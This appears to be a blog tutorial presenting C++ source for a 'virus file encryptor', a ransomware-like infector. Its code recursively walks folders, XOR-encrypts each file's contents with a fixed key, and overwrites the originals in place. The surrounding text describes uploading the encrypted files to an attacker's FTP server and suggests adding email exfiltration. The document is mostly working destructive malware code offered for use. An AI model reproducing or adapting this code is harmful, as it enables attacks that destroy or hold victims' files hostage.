Encrypting the content of files via file infector .
Virus file encryptor is type of infector, that changes the content of the files by overwriting it in encrypted form.
The overwritten files are uploaded to the server (ftp...) where the attacker downloads them and edits the content using a decryptor.
Algorithm:
- Recursively go through the specified folder(s) or all of its subfolders.
- If a file is found in the folder, open it and load all lines into the buffer.
- The data buffer with the content of the found file encrypt via algorithm and store in the buffer.
- Encrypted buffer contents save to the file.
Algorithm can be supplemented by other steps, such as upload to ftp server, send to email, and so on.
Libraries:
#include "Convert.h" //https://www.netbot.sk/en/14-blog-headers/86-convert-h-en #include "WinAPI.h" //https://www.netbot.sk/en/14-blog-headers/44-winapi-en #include <iterator> #include <iostream> #include <fstream> #include <vector> #include <dirent.h> //http://softagalleria.net/dirent.php #include <string>
Recursive files searching function in folder:
void ListFiles(const char * locatefolder) { if(this->directory=::opendir(locatefolder)) { //Read content of directory, while the content exists.// while(entry = ::readdir(this->directory)) { if(::strcmp(entry->d_name,".")!=0 && ::strcmp(entry->d_name,"..")!=0) { //String copy the path of the directory and names of found files.// ::strncpy(this->pathbuffer, locatefolder, sizeof(this->pathbuffer)); ::strncat(this->pathbuffer, entry->d_name, sizeof(this->pathbuffer)); //Compares, if names are of files or of folders.// if(::stat(this->pathbuffer,&this->status) == 0) { if(!this->IsDirectory((const char*)this->pathbuffer)) { //Show only names of files.// ::std::cout << this->pathbuffer << "\n"; //Handling names of files. Calls these 3 methods.// this->GetFileContent(this->pathbuffer); this->EncryptData(); this->SaveContent(); } } } } ::closedir(this->directory); } }
Function for saving content of the file to the buffer
::std::string GetFileContent(const char *filename) { this->inputfilename = filename; this->inputfilename_ = filename; //Open the file.// ::std::ifstream read(filename, std::ios::in | std::ios::binary); if (read) { //Read content of the file.// read.seekg(0, ::std::ios::end); this->contents.resize(read.tellg()); read.seekg(0, ::std::ios::beg); read.read(&this->contents[0], this->contents.size()); read.close(); return this->contents; } }
Function for encrypting data buffer content:
::std::string EncryptData(void) { //Specify key for encrypting.// char key = 'K'; this->encryptcontents = this->contents; //Encrypting with XOR.// for (int i = 0; i < this->encryptcontents.size(); i++) { this->encryptcontents[i] = this->encryptcontents[i] ^ key; } return this->encryptcontents; }
Saving encrypted data buffer content to the file:
void SaveContent(void) { //Convert from string to char*// this->encrypteddata = new char[this->encryptcontents.size() + 1]; copy(this->encryptcontents.begin(),this->encryptcontents.end(),this->encrypteddata); this->encrypteddata[this->encryptcontents.size()] = '\0'; //Write encrypted data to the file// this->handlefile = ::CreateFileA(this->inputfilename_, GENERIC_WRITE, 0, NULL,
TRUNCATE_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); ::WriteFile(this->handlefile, this->encrypteddata, encryptcontents.size(), 0, NULL); }